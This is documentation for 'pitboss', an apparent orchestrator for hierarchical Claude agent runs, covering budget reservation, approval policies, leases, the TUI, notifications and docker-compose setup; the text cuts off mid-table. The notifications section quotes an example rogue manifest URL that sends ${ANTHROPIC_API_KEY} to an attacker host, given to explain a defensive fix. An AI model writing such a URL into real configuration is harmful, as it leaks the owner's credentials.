When you call spawn_worker, pitboss reserves the worker’s estimated_cost_usd against the run’s budget before the worker starts. On completion, the reservation is released and the actual spend is recorded. This prevents budget overruns but has a practical consequence: if your estimate is too low, spawn_worker fails (“budget exceeded”) before the worker has done anything. If too high, other workers can’t spawn until the first one finishes and releases its reservation.
Practical defaults:
- Set
estimated_cost_usdper worker at 1.5× your typical actual cost for that task type. The 50% margin accounts for variance in input size and response verbosity. - Set
budget_usdat 1.2× the sum of all expected worker estimates. The 20% margin covers the lead’s own token use and any workers that run over their estimate.
Example for a run with 5 medium-audit workers (Sonnet 4.6, expected ~$0.50 each):
estimated_cost_usd per worker = $0.50 × 1.5 = $0.75
Sum of estimates = 5 × $0.75 = $3.75
budget_usd = $3.75 × 1.2 = $4.50
Cross-reference: Manifest schema → budget_usd for the full reservation accounting semantics.
The “Haiku-as-lead, Sonnet-as-worker” pattern
The most common cost-effective pattern for hierarchical runs:
- The lead’s job is tool dispatch and simple decisions — which worker to spawn next, when to stop, how to aggregate results. This is not demanding reasoning. Haiku handles it well at roughly one-fifth the input cost of Sonnet.
- Workers do the actual reasoning — reading code, writing reports, producing patches. Sonnet’s stronger tool use and reasoning quality is worth the cost premium at the task level.
A typical depth-1 run with 5 workers under this pattern:
- Lead (Haiku, ~$0.05 total): reads the task list, spawns workers, waits, summarizes
- 5 workers (Sonnet, ~$0.20 each = ~$1.00 total)
- Total: ~$1.05
The alternative — Sonnet-as-lead with Sonnet-as-worker — costs the same or more, but wastes Sonnet’s reasoning capacity on loop bookkeeping the lead doesn’t need.
When not to use this pattern
Use Sonnet (or higher) for the lead when:
- The lead makes complex strategic decisions. If the lead needs to interpret cross-worker results and decide whether to change approach mid-run, Haiku’s reasoning limitations become a bottleneck.
- The lead is synthesizing across many outputs into a unified artifact. Writing a coherent 10-section report that synthesizes 20 worker results is reasoning-heavy work. Use Sonnet.
- The plan requires backtracking. Multi-step plans where the lead must detect failures and re-plan benefit from Sonnet’s stronger context handling.
Haiku-as-lead works best when the lead’s decision tree is shallow: “for each item, spawn a worker; wait for all; write a summary.” Anything more complex, consider Sonnet.
Sub-leads and cost compounding
With depth-2 sub-leads (v0.6+), costs multiply across tiers:
Root lead (1 session)
├── Sub-lead A (1 session)
│ ├── Worker A1 (1 session)
│ ├── Worker A2 (1 session)
│ └── Worker A3 (1 session)
├── Sub-lead B (1 session)
│ └── ...
└── Sub-lead C (1 session)
└── ...
A run with 1 root + 3 sub-leads + 4 workers each = 16 sessions. At Haiku-only pricing for all sessions, even 50K token/session average is 800K tokens, which costs ~$0.80–$4 depending on input/output split. At Sonnet pricing the same run is $3–$16.
Sub-lead cost control mechanisms in the manifest:
[run]
budget_usd = 20.00
[[lead]]
id = "root"
model = "claude-haiku-4-5"
allow_subleads = true
max_subleads = 4
max_sublead_budget_usd = 3.00 # hard ceiling per sub-lead
max_workers_across_tree = 12 # bounds peak concurrency (and peak spend rate)
[lead.sublead_defaults]
budget_usd = 2.00 # default envelope per sub-lead
max_workers = 3
lead_timeout_secs = 1800
sublead_defaults means you don’t have to specify budget on every spawn_sublead call. max_sublead_budget_usd is a hard ceiling enforced by pitboss — the root lead cannot accidentally grant more even if its prompt instructs it to.
See Depth-2 sub-leads for the full sub-lead envelope model.
Reservation overhead in practice
Understanding the reservation lifecycle helps diagnose “budget exceeded” failures that appear before workers have done any work.
The lifecycle:
spawn_workeris called withestimated_cost_usd = X- Pitboss checks:
spent + reserved + X ≤ budget_usd. If not, spawn fails. - If the check passes, X is added to
reserved_usdand the worker starts. - On completion, X is released from
reserved_usdand actual spend is added tospent_usd.
Common pitfalls:
- Over-reserving (“to be safe”): Setting
estimated_cost_usdhigh means each worker blocks a large slice of the budget. With 5 workers each estimated at $2 and a $6 budget, only 3 workers can be in-flight at once — the fourth and fifth spawn calls fail until a slot releases. The run serializes instead of parallelizing. - Under-reserving: If a worker’s actual spend exceeds its estimate, pitboss reconciles on completion. This won’t crash the worker mid-task, but the
spent_usdwill exceedbudget_usdon reconciliation. Pitboss records the overrun but does not retroactively kill the offending worker. - Reservation leak: In rare cases (subprocess crash before reconciliation, pre-Phase-4 race conditions), a reservation stays held after the worker is gone. The reservation releases on pitboss restart. Use
pitboss attachto monitorreserved_usdin real time and spot this pattern.
Mitigations:
- Derive estimates from observed history. Run 3–5 representative tasks manually, measure actual token usage, set
estimated_cost_usdat 1.5× the observed mean. - Monitor with
pitboss attachduring the first few runs of a new manifest to validate your estimate calibration. - Set
budget_usdwith 20% headroom over the sum of expected estimates.
See also
- Manifest schema —
budget_usd,estimated_cost_usd,max_sublead_budget_usdfield reference - Depth-2 sub-leads — sub-lead envelope mechanics and
sublead_defaults - Defense-in-depth → Cost firewall pattern — using per-sub-lead budget envelopes as a security control against runaway spend
Approvals
Pitboss provides two approval primitives that let a lead gate actions on operator review:
request_approval— gate a single in-flight action on operator approval.propose_plan— gate the entire run on a pre-flight plan approval.
Both route to the TUI’s approval pane. Without a TUI attached, the [run].approval_policy field controls automatic behavior.
request_approval
The lead calls request_approval when it wants the operator to review a specific action before proceeding. The lead blocks until the operator approves, rejects, or edits.
Args:
{
"summary": "string",
"timeout_secs": 60,
"plan": {
"summary": "string",
"rationale": "string",
"resources": ["path/to/file.rs"],
"risks": ["May overwrite uncommitted changes"],
"rollback": "git checkout -- path/to/file.rs"
}
}
The plan field is optional but strongly recommended for non-trivial actions (deletions, multi-file edits, irreversible operations). The TUI renders the structured fields as labeled sections, with risks highlighted in warning color.
Returns:
{
"approved": true,
"comment": "optional operator comment",
"edited_summary": "optional edited version"
}
propose_plan
The lead calls propose_plan before spawning any workers when a pre-flight review is desired. When [run].require_plan_approval = true, spawn_worker refuses until a propose_plan call has been approved.
The TUI modal shows [PRE-FLIGHT PLAN] in its title (vs [IN-FLIGHT ACTION] for request_approval). On rejection, the gate stays closed — the lead can revise and call propose_plan again.
When require_plan_approval = false (the default), calling propose_plan is still valid but informational only — spawn_worker never checks the result.
[run].approval_policy
Controls handling of approval requests when no TUI is attached:
| Value | Behavior |
|---|---|
"block" (default) | Queue until a TUI connects, or until lead_timeout_secs expires. |
"auto_approve" | Immediately approve. Useful for CI or unattended runs. |
"auto_reject" | Immediately reject with comment: "no operator available". |
[[approval_policy]] — declarative policy rules (v0.6+)
For finer control, declare deterministic policy rules in the manifest. Rules are evaluated in pure Rust — not LLM-evaluated — before approvals reach the operator queue.
# Auto-approve routine tool-use from sub-lead S1
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"
# Always block plan-category approvals for explicit review
[[approval_policy]]
match = { category = "plan" }
action = "block"
# Block any cost event over $0.50
[[approval_policy]]
match = { category = "cost", cost_over = 0.50 }
action = "block"
Rules are evaluated first-match-wins in declaration order. A request that doesn’t match any rule falls through to the run-level approval_policy.
Match fields
| Field | Type | Notes |
|---|---|---|
actor | string | Actor path, e.g., "root→S1". Unset matches all actors. |
category | string | "tool_use", "plan", "cost". Unset matches all categories. |
tool_name | string | Specific MCP tool name. Unset matches all. |
cost_over | float | Fires when cost_estimate > cost_over (USD). |
Actions
| Action | Effect |
|---|---|
"auto_approve" | Immediately approve; never reaches the operator queue. |
"auto_reject" | Immediately reject. |
"block" | Force operator review regardless of run-level approval_policy. |
Approval TTL and fallback (v0.6+)
Each approval request can carry an optional TTL:
timeout_secs— the lead can pass a timeout on itsrequest_approvalcall.fallback— if the approval ages past its TTL without an operator response, the fallback fires (auto_reject,auto_approve, orblock). Prevents an unreachable operator from permanently stalling the tree.
TUI approval pane
In the TUI, a non-modal right-rail (30% width) shows pending approvals as a queue. Press 'a' to focus the pane; Up/Down navigate; Enter opens the detail modal.
In the modal:
y— approven— reject (can add an optional reason comment)e— edit (Ctrl+Enter to submit, Esc to cancel)
The reject branch accepts an optional reason string that flows back through MCP to the requesting actor’s session, allowing Claude to adapt without a separate reprompt_worker round-trip.
Reject-with-reason
When an approval is rejected with a reason, the reason is included in the MCP response returned to the lead. This allows the lead to adapt its behavior immediately (e.g., switch output format, try a different approach) without requiring a separate reprompt_worker call.
Using approvals as a security control
[[approval_policy]] can be used to gate state-changing tool invocations before they execute, independent of operator availability. See Security → Defense-in-depth → Approval-gated state-changing tools for a manifest pattern that auto-approves reads and blocks writes for operator review.
Approval policy reference
Overview
The [[approval_policy]] TOML block defines deterministic approval rules that auto-resolve requests before they reach the operator. Rules are pure Rust evaluation, NOT LLM-evaluated.
Each rule matches against fixed approval fields (actor path, category, tool name, cost estimate) and applies an action (auto_approve, auto_reject, or block). Rules are evaluated in declaration order; the first match wins. If no rule matches, the approval falls through to the run-level [run].approval_policy (or the operator queue if no default is set).
Why it exists: At depth-2 scale where N concurrent sub-leads can spawn M approval requests each, the operator queue drowns in noise. Policy rules handle routine approvals deterministically, surfacing only exceptional cases.
TOML syntax
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use", tool_name = "Bash", cost_over = 0.50 }
action = "auto_approve"
[[approval_policy]]
match = { category = "plan" }
action = "block"
[[approval_policy]]— each rule is a separate array-of-tables block.match— TOML inline table of conditions. All fields are optional; an emptymatch = {}matches every approval (catch-all). Multiple match fields use AND semantics.action— one of"auto_approve","auto_reject", or"block".
Match fields reference
| Field | Type | Matches when | Notes |
|---|---|---|---|
actor | string (optional) | The approval’s actor_path rendered as a string (e.g., "root" or "root→S1") equals the value | Use "root" for root-level requests. Use "root→<sublead_id>" for a specific sub-lead; sub-lead IDs are UUIDv7 and runtime-generated, so this field is most useful when you know the sub-lead’s identity in advance — e.g., from a prior spawn_sublead response. Exact string match only; no wildcard patterns. |
category | enum (optional) | The approval’s category field equals the value exactly | Allowed values: "tool_use", "plan", "cost", "other". Most request_approval calls land in tool_use; propose_plan lands in plan. Cost-category approvals are not emitted by default (see deferment notes). |
tool_name | string (optional) | The lead’s optional tool_name hint on request_approval equals the value | Only fires if the lead populates the optional tool_name arg. Without it, this field never matches. Exact string match only. |
cost_over | float (optional) | The lead’s optional cost_estimate hint exceeds this threshold (strict > comparison) | Only fires if the lead passes a cost_estimate arg to request_approval. Without it, this field never matches. Numeric greater-than comparison. |
Action values
| Action | Effect |
|---|---|
"auto_approve" | Approval is resolved as approved without operator interaction. The requesting actor’s MCP call returns approved=true immediately. Logged at info level for audit trail. |
"auto_reject" | Approval is resolved as rejected without operator interaction. The requesting actor receives approved=false. The response includes reason text "auto-rejected by policy". |
"block" | Forces the approval to enqueue for operator action regardless of its match. Overrides any run-level [run].approval_policy default that would be permissive. Useful for “always require explicit approval for X” rules. |
Evaluation order and semantics
- Rules are evaluated in declaration order from top to bottom in the manifest.
- The first rule whose
matchclause fully matches (all specified fields match) wins. Itsactionis applied immediately. - If no rule matches any approval field, the approval falls through to the run-level
[run].approval_policyvalue. - If no run-level policy is set and no rule matches, the approval is queued for the operator (the default v0.5 behavior).
blockaction does NOT short-circuit further rule evaluation for other approvals. It only guarantees the current approval reaches the operator queue.
Worked examples
Pattern A: Auto-approve routine reads, surface mutations
[[approval_policy]]
match = { tool_name = "Read" }
action = "auto_approve"
[[approval_policy]]
match = { tool_name = "Glob" }
action = "auto_approve"
[[approval_policy]]
match = { tool_name = "Grep" }
action = "auto_approve"
# Everything else (Bash, Write, Edit, etc.) falls through to operator
How it works: Leads must populate tool_name on their request_approval calls for this to work. File reads are auto-approved, reducing noise. Any other tool (including Write, Edit, Bash, or custom MCP tools) reaches the operator.
Note: Requires the lead’s prompt to pass tool_name on every request_approval call. Without it, these rules won’t fire.
Pattern B: Block all plan approvals, auto-approve trusted sub-lead’s tool use
[[approval_policy]]
match = { category = "plan" }
action = "block"
[[approval_policy]]
match = { actor = "root→sublead-trusted-id", category = "tool_use" }
action = "auto_approve"
How it works: Order matters. The category = "plan" rule fires first, blocking all propose_plan calls for explicit operator review. The second rule auto-approves tool-use from a specific trusted sub-lead (once you know its UUIDv7). Tool-use from other actors falls through to the operator.
When to use: Multi-phase runs where you want to gate each phase’s plan proposal (to catch logic errors early) but trust a specific sub-lead’s tool invocations.
Pattern C: Cost-bounded auto-approval
[[approval_policy]]
match = { category = "cost", cost_over = 1.00 }
action = "block"
[[approval_policy]]
match = { category = "cost" }
action = "auto_approve"
How it works: Cost-category approvals over $1.00 always reach the operator. Smaller ones auto-approve. This is a firewall against unexpectedly expensive operations.
Note: This pattern is forward-looking. As of v0.6, leads do not emit cost-category approvals by default. The lead must explicitly call request_approval with category = "cost" for these rules to fire. See deferment notes below.
Deferment notes
The following features are not in v0.6 but are requested or planned:
Runtime policy mutation
TUI commands to add/remove rules mid-run are deferred to v0.7+. v0.6 reads the policy once at manifest load. You cannot change rules while a run is in flight.
No regex or glob patterns in match values
Match fields support exact string comparison only. Wildcard patterns like tool_name = "Read*" or actor = "root→sublead-*" are not supported. Matching is literal. If you have a use case that needs wildcard matching (e.g., “auto-approve all Read variants”), please file an issue.
Cost-category approvals are not emitted by default
The request_approval MCP tool defaults to category = "tool_use". For cost-category rules to fire in practice, the lead must explicitly pass category = "cost" when calling request_approval. Most leads don’t do this yet, so cost-category rules have limited utility in v0.6.
Rule-index attribution in logs
Auto-action logs say “auto-approved by policy” or “auto-rejected by policy” but do not (currently) name which rule fired. Adding rule indices to audit logs is a small followup that would help track which policy pattern is in effect.
See also
- Approvals — operator-side workflow (TUI pane, reject-with-reason, TTL fallback)
- Defense-in-depth → Approval-gated state-changing tools — how to use policy as a security control pattern
- MCP Tool Reference → Approvals — the underlying
request_approvalandpropose_planMCP tools
Leases & coordination
Pitboss provides a hierarchical coordination surface for workers and leads:
- Per-layer KV store — an in-memory key-value store per dispatch layer (root, each sub-lead). Four namespaces with different access rules.
- Per-layer leases —
/leases/*namespace within each layer’s KV store. - Run-global leases —
run_lease_acquire/run_lease_releasefor cross-tree coordination (v0.6+).
The KV namespaces
All KV tools operate on paths within the current layer’s store.
| Namespace | Who can write | Who can read | Use for |
|---|---|---|---|
/ref/* | Lead only | All actors in this layer | Shared configuration, task lists, conventions the lead wants all workers to see |
/peer/<actor-id>/* | That actor only (and lead as override) | That actor + the layer’s lead | Per-worker outputs (findings, status flags, partial results) |
/peer/self/* | Any actor | — | Alias: the dispatcher resolves /peer/self/ to /peer/<caller.actor_id>/ at the tool layer |
/shared/* | All actors | All actors | Loose cross-worker coordination (shared findings, counters) |
/leases/* | Managed via lease_acquire / lease_release | — | Mutual exclusion within this layer |
KV tools
| Tool | Purpose |
|---|---|
kv_get | Read a single entry by path |
kv_set | Write a value; bumps version on each write |
kv_cas | Compare-and-swap: write only if the current version matches expected_version |
kv_list | List entries matching a glob pattern |
kv_wait | Block until a path reaches a minimum version (long-poll) |
lease_acquire | Acquire a named lease with a TTL; blocks or fails if held |
lease_release | Release a held lease |
See Coordination & state for full signatures and return shapes.
Lease acquisition
lease_acquire(name: string, ttl_secs: u32, wait_secs?: u32)
→ { lease_id, version, acquired_at, expires_at }
name— the lease key (a path under/leases/*).ttl_secs— how long the lease lives after acquisition. The lease auto-expires if the holder crashes.wait_secs— optional: block up to this many seconds for the lease to become available. Default: fail immediately if already held.
Leases are auto-released when the holding actor’s MCP session terminates (connection drop, worker crash, etc.).
Per-layer vs run-global leases
Use /leases/* (per-layer) for resources internal to the current sub-tree:
- A worker-coordinated counter for “next chunk to process within this sub-tree”
- A mutex for a shared file within one phase’s working directory
- Any resource only one sub-tree ever writes to
Use run_lease_acquire (run-global) for resources that span sub-trees:
- A path on the operator’s filesystem that any sub-tree might write to
- A shared service or port that multiple sub-leads compete for
- Any resource that must be serialized across the entire dispatch tree
run_lease_acquire(key: string, ttl_secs: u32) → { lease_id, version }
run_lease_release(lease_id: string) → { ok: true }
The run-global registry is on DispatchState — outside any layer — so it spans all sub-trees.
When in doubt: prefer run_lease_acquire. Over-serializing is safer than silent cross-tree collision.
Shared store dump
Set dump_shared_store = true in [run] to write <run-dir>/shared-store.json at finalize time. Useful for post-mortem inspection of cross-worker coordination state.
[run]
dump_shared_store = true
Using leases as a security control
Run-global leases can serialize access to sensitive shared resources — deploy pipelines, credential stores, shared output paths — preventing concurrent writes from multiple agents. See Security → Defense-in-depth → Run-global lease as serialization gate for a manifest pattern and commentary on what this does and does not protect.
Architecture note
The KV store is in-memory and per-run. It is not persisted between runs (except via the optional shared-store.json dump). Workers in separate runs cannot see each other’s state.
See Lease scope selection for a deeper discussion of the architectural rationale.
TUI
pitboss-tui is the live floor view: a tile grid of all workers in the current run, with live log tailing, budget and token counters, and a full control plane for cancellation, pause, reprompt, and approval management.
Opening the TUI
pitboss-tui # open the most recent run
pitboss-tui 019d99 # open a run by UUID prefix
pitboss-tui list # print a table of runs to stdout
The TUI polls the run directory at 250ms intervals. It can open a run while dispatch is in progress (most useful) or after the fact for post-mortem review.
Grid view
The main view is a tile grid. Each tile represents one actor (lead, sub-lead, or worker). Tiles show:
- Actor role and ID (with
★for leads,▸for workers) - Current state:
Running,Done,Failed,Paused,Frozen,Cancelled, etc. - Model family color swatch (opus = magenta, sonnet = blue, haiku = green)
- Partial token count and cost estimate
- KV/lease activity counters when non-zero (
kv:N lease:M)
In depth-2 runs, sub-trees render as collapsible containers with a header showing the sub-lead ID, budget bar, worker count, and approval badge.
Detail view
Press Enter on a tile to open the Detail view. It’s a split pane:
- Left — identity, lifecycle, token totals + cost, activity counters (tool calls / results / top tools), and a one-shot
git diff --shortstatsummary. - Right — scrollable log with semantic color coding (assistant text = white, tool use = cyan, tool results = green, rate limits = yellow, result events = magenta, system = gray).
Scroll the log:
| Keys | Scroll |
|---|---|
j / k / arrows | 1 row |
J / K | 5 rows |
Ctrl-D / Ctrl-U / PageDown / PageUp | 10 rows |
g / G | Jump to top / bottom (G re-enables auto-follow) |
| Scroll wheel | 5 rows/tick |
Navigation keybindings
| Key | Action |
|---|---|
h j k l / arrows | Navigate tiles in grid view |
Enter | Open Detail view for focused tile |
o | Run picker (switch to another run) |
? | Help overlay (full keybinding reference) |
q / Ctrl-C | Quit |
Esc | Close any overlay or modal |
Tab | Cycle focus across sub-tree containers (depth-2 runs) |
Control plane keybindings
| Key | Action |
|---|---|
x | Cancel focused worker (with confirm modal) |
X | Cancel entire run (cascades to all workers) |
p | Pause focused worker (requires initialized session) |
c | Continue paused worker |
r | Open reprompt textarea (Ctrl+Enter to submit, Esc to cancel) |
Approval pane
Press 'a' to focus the approval list pane (right-rail, 30% width). Pending approvals queue here as they arrive.
| Key | Action |
|---|---|
Up / Down | Navigate the approval queue |
Enter | Open detail modal for selected approval |
In the approval modal:
| Key | Action |
|---|---|
y | Approve |
n | Reject (optionally add a reason comment) |
e | Edit the summary (Ctrl+Enter to submit, Esc to cancel) |
Mouse support
| Action | Effect |
|---|---|
| Left-click tile | Focus + open Detail |
| Left-click run in picker | Open that run |
| Right-click inside Detail | Exit back to grid |
| Scroll wheel inside Detail | Scroll log 5 rows/tick |
pitboss attach — single-worker follow mode
For a terminal-only follow view on one worker without the full TUI:
pitboss attach <run-id> <task-id>
pitboss attach <run-id> <task-id> --raw # stream raw stream-JSON jsonl
pitboss attach <run-id> <task-id> --lines 200 # larger backfill
Run-id is resolved by prefix (first 8 chars are enough when unique). Exits on Ctrl-C or when the worker emits its terminal result.
Notifications
Pitboss can push notifications to external sinks when key run events occur. This is useful for monitoring long-running dispatches from outside the TUI — for example, getting a Slack message when a budget-intensive run finishes.
Configuration
Add a [[notification]] section to your manifest for each sink:
[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}" # env-var substitution supported (prefix required, see below)
events = ["run_finished", "budget_exceeded"]
severity_min = "info"
[[notification]]
kind = "discord"
url = "${PITBOSS_DISCORD_WEBHOOK_URL}"
events = ["approval_request", "approval_pending", "run_finished"]
[[notification]]
kind = "webhook"
url = "https://my-server.example.com/pitboss-events"
events = ["approval_request", "budget_exceeded", "run_finished"]
The top-level field is kind, not type. TOML parses it literally — a type = "slack" line will be rejected with an unknown field error at validate time.
Supported sinks
| Sink | kind value | Notes |
|---|---|---|
| Generic HTTP POST | "webhook" | Sends a JSON payload with the event |
| Slack Incoming Webhook | "slack" | Formats as a Slack message block |
| Discord Webhook | "discord" | Formats as a Discord embed with severity-coded color, markdown-escaped fields, and allowed_mentions: [] |
| Log only | "log" | Writes to stderr via tracing; useful for debugging + CI contexts where the operator watches logs |
Events
| Event | Severity | When it fires |
|---|---|---|
approval_request | Warning | An approval is enqueued for operator action (v0.6+) |
approval_pending | Warning | An approval enqueues and awaits operator action with no TUI attached (v0.6+) — distinct from approval_request for alerting when a run is blocked |
run_finished | Info | The dispatch completes (all tasks settled or cancelled) |
budget_exceeded | Critical | A spawn_worker or spawn_sublead fails due to budget exhaustion |
Severity filtering
The optional severity_min field filters by the event’s declared severity (not a per-sink override — each event has a fixed severity). Ordering is info < warning < error < critical. Default is "info" (emit everything).
For example, severity_min = "warning" on a Discord sink skips run_finished (Info) but delivers approval_request (Warning) and budget_exceeded (Critical).
Delivery semantics
- Notifications fire asynchronously via
tokio::spawn— they don’t block the dispatch. - Failed deliveries are retried up to 3 times with exponential backoff (100ms → 300ms → 900ms).
- An LRU dedup cache (size 64) prevents retry storms for the same event. Dedup key is
{run_id}:{event_kind}[:{discriminator}](discriminator isrequest_idfor approval events,"first"for budget exceeded). - Delivery failures are logged via
tracing::error!with the sink id and dedup key. The dispatcher continues regardless — notification failures never fail a run. - Per-attempt HTTP timeout: 30 seconds.
Env-var substitution
URLs support ${PITBOSS_VAR_NAME} substitution from the process environment. This keeps webhook URLs (which are themselves secrets — anyone with the URL can post to the channel) out of manifest files that might be committed to git:
[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"
events = ["run_finished"]
As of v0.7.1, only env vars whose names start with PITBOSS_ may be substituted. This closes an exfiltration vector where a rogue manifest could write url = "https://attacker/?t=${ANTHROPIC_API_KEY}" and leak any host env var to a chosen webhook. Unprefixed names fail loudly at validate time rather than silently reaching through to std::env::var.
If you were using an unprefixed var name in older manifests, rename it in your shell init (or deployment config):
# Before
export SLACK_WEBHOOK_URL="https://hooks.slack.com/..."
# After (v0.7.1+)
export PITBOSS_SLACK_WEBHOOK_URL="https://hooks.slack.com/..."
Webhook URL validation (v0.7.1+)
Beyond the env-var prefix, all webhook / slack / discord URLs are validated at manifest load:
- Scheme must be
https://.http://,file://, and other non-https schemes are rejected. - Host must not resolve to a loopback, private, link-local, unspecified, broadcast, CGNAT (
100.64.0.0/10), IPv6 ULA (fc00::/7), or IPv6 link-local (fe80::/10) address. IPv4-mapped IPv6 (::ffff:127.0.0.1) is also rejected. - Hostnames like
localhostand*.localhostare blocked by name.
If you need to post to an internal service for development, the workaround is to route through a public relay (e.g. an ngrok tunnel) — pitboss will not speak directly to a private address.
Discord sink: markdown and mention safety (v0.7.1+)
The Discord sink escapes markdown and mention characters (* _ ~ \ | > # [ ] ( ) @ < :) in untrusted fields (request_id, task_id, summary, run_id, source) before embedding them in the Discord description. Each payload also sets allowed_mentions: { parse: [] } so Discord doesn’t resolve @everyone / @here / user / role / channel mentions even if one sneaks past the escaping.
Slack sink parallel hardening is a known roadmap item — until it lands, avoid routing untrusted content (task summaries from external sources) through Slack.
For the canonical notification schema reference, see AGENTS.md in the source tree.
Running Pitboss with docker-compose
Compose files for the common deployment shapes. All examples work with
podman compose or docker compose unchanged — the files below use
plain Compose v2 syntax with no Docker-specific extensions.
If you haven’t yet: pull the image once.
podman pull ghcr.io/sds-mode/pitboss:latest
Shared prerequisites
-
Host auth:
claude loginhas been run on the host at least once, so~/.claude/.credentials.jsonexists. This file gets bind-mounted into every example. -
Host
claudebinary: until thepitboss-with-claudevariant ships (v0.7+ — see Using Claude in a container once PR2 lands), operators using the barepitbossimage also mount their host’sclaudebinary. Find it with:which claude # typical: /usr/local/bin/claude (npm global) # ~/.claude/local/claude-bundle/claude (Anthropic installer)The examples assume
/usr/local/bin/claude. Adjust if yours differs. -
SELinux hosts (Fedora/RHEL/Rocky) need
:zon bind mounts — the examples include it. It’s a no-op on Ubuntu/Debian. -
UID alignment: set
UID/GIDenv vars before running compose so the container process matches your host user and mounted files stay writable:export UID=$(id -u) export GID=$(id -g)
Example 1 — One-shot headless dispatch
Fires off a dispatch and exits. Good for CI, cron jobs, “run this manifest against this repo and email me when done” scripts.
Project layout:
my-project/
├── docker-compose.yml
├── manifest.toml
├── repo/ # your target git repo
└── runs/ # created on first run; pitboss writes here
docker-compose.yml:
services:
pitboss:
image: ghcr.io/sds-mode/pitboss:latest
user: "${UID:-1000}:${GID:-1000}"
working_dir: /workspace
command: pitboss dispatch /run/pitboss.toml
volumes:
# Host auth (OAuth tokens). Read-write: claude rotates tokens.
- ${HOME}/.claude:/home/pitboss/.claude:rw,z
# Host claude binary. Remove once pitboss-with-claude ships.
- /usr/local/bin/claude:/usr/local/bin/claude:ro
# Manifest + target repo + run-output dir.
- ./manifest.toml:/run/pitboss.toml:ro
- ./repo:/workspace:rw,z
- ./runs:/home/pitboss/.local/share/pitboss:rw,z
Run it:
podman compose up # stream logs, exit when done
podman compose up --abort-on-container-exit # if using docker compose
Inspect the run afterward:
ls runs/ # one directory per run-id
cat runs/<run-id>/summary.json | jq
Example 2 — Long-running dispatch + TUI attached
Use when you want the TUI’s live floor view while a hierarchical run is in flight. Two services share the run-state directory; the TUI runs attached to a TTY.
docker-compose.yml:
x-pitboss-env: &pitboss-env
user: "${UID:-1000}:${GID:-1000}"
working_dir: /workspace
services:
dispatch:
<<: *pitboss-env
image: ghcr.io/sds-mode/pitboss:latest
command: pitboss dispatch /run/pitboss.toml
volumes:
- ${HOME}/.claude:/home/pitboss/.claude:rw,z
- /usr/local/bin/claude:/usr/local/bin/claude:ro
- ./manifest.toml:/run/pitboss.toml:ro
- ./repo:/workspace:rw,z
- pitboss-runs:/home/pitboss/.local/share/pitboss
tui:
<<: *pitboss-env
image: ghcr.io/sds-mode/pitboss:latest
command: pitboss-tui
tty: true
stdin_open: true
depends_on:
- dispatch
volumes:
- pitboss-runs:/home/pitboss/.local/share/pitboss:rw
volumes:
pitboss-runs:
Run with:
podman compose up -d dispatch # start dispatch in background
podman compose run --rm tui # attach TUI to a TTY
The TUI process exits when you q. Dispatch keeps running in the
background. podman compose down when the dispatch finishes (or
before to cancel).
Shared volume note: pitboss-runs is a named volume rather than a
host bind mount so both services see the same state dir without
SELinux label juggling. If you want the runs on the host filesystem,
swap it for ./runs:/home/pitboss/.local/share/pitboss:rw,z in both
services.
Example 3 — Headless dispatch with webhook notifications
Same as Example 1, but the manifest is wired to fire a Slack webhook when an approval is pending or the run finishes. Useful for long-running batch work where you want the run to continue autonomously but still get poked when it ends or needs you.
manifest.toml:
[run]
max_workers = 6
budget_usd = 2.00
lead_timeout_secs = 3600
approval_policy = "block"
[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"
events = ["approval_pending", "run_finished"]
severity_min = "info"
[[lead]]
id = "main"
directory = "/workspace"
prompt = "..."
docker-compose.yml:
services:
pitboss:
image: ghcr.io/sds-mode/pitboss:latest
user: "${UID:-1000}:${GID:-1000}"
working_dir: /workspace
command: pitboss dispatch /run/pitboss.toml
environment:
# Notification webhook env vars must be `PITBOSS_`-prefixed — pitboss
# only substitutes `${VAR}` tokens into notification URLs when the
# name starts with `PITBOSS_`, so host secrets can't be exfiltrated
# by a rogue manifest.
PITBOSS_SLACK_WEBHOOK_URL: ${PITBOSS_SLACK_WEBHOOK_URL}
volumes:
- ${HOME}/.claude:/home/pitboss/.claude:rw,z
- /usr/local/bin/claude:/usr/local/bin/claude:ro
- ./manifest.toml:/run/pitboss.toml:ro
- ./repo:/workspace:rw,z
- ./runs:/home/pitboss/.local/share/pitboss:rw,z
Run with the webhook URL in the shell environment:
export PITBOSS_SLACK_WEBHOOK_URL="https://hooks.slack.com/services/..."
podman compose up
The ${VAR} substitution in manifest.toml is done by pitboss itself
at dispatch-time, so the env var flows: shell → compose environment:
→ container env → pitboss → manifest. Only names starting with
PITBOSS_ are substituted; ${ANTHROPIC_API_KEY} or ${AWS_SECRET}
in a webhook URL would be refused at load time. Webhook URLs must
also be https:// and must not resolve to a loopback, private,
link-local, or CGNAT address.
Example 4 — pitboss-with-claude variant (v0.7+)
Once the bundled variant ships (PR2 of the 2-PR sequence adding
ghcr.io/sds-mode/pitboss-with-claude), drop the host-claude bind mount
and switch the image name:
services:
pitboss:
image: ghcr.io/sds-mode/pitboss-with-claude:latest
user: "${UID:-1000}:${GID:-1000}"
working_dir: /workspace
command: pitboss dispatch /run/pitboss.toml
volumes:
- ${HOME}/.claude:/home/pitboss/.claude:rw,z
# No host-claude mount needed — claude is bundled at a pinned version.
- ./manifest.toml:/run/pitboss.toml:ro
- ./repo:/workspace:rw,z
- ./runs:/home/pitboss/.local/share/pitboss:rw,z
Troubleshooting
“claude: command not found” inside the container. The host-binary
mount path doesn’t match where your claude is installed. Run
which claude on the host and update the /usr/local/bin/claude
line in the compose file.
“Permission denied” reading .credentials.json. UID mismatch
between the container process and the mounted file. Make sure UID
and GID are exported in your shell before podman compose up.
Worker worktrees fail with “repository is dirty”. The bind mount
at /workspace points at a repo with uncommitted changes, and
use_worktree = true (the default) wants a clean tree. Either commit
first, or set use_worktree = false in [defaults] for read-only
analysis runs.
SELinux AVC denials in the host audit log. Add ,z to the bind
mount flags (./repo:/workspace:rw,z). The z label tells SELinux
this mount is shared across containers/host, applying a compatible
context.
Rootless podman + :z label. Rootless podman can’t write SELinux
labels on directories it doesn’t own. Workaround: chcon -Rt container_file_t ./runs ./repo once as a privileged user, or use
named volumes (Example 2’s pattern).
See also
- Using Claude in a container (available in v0.7+)
- Notifications — full
[[notification]]sink reference - TUI — operator-side TUI guide
Using Claude in a container
Pitboss ships two container images:
| Image | What’s inside | When to use |
|---|---|---|
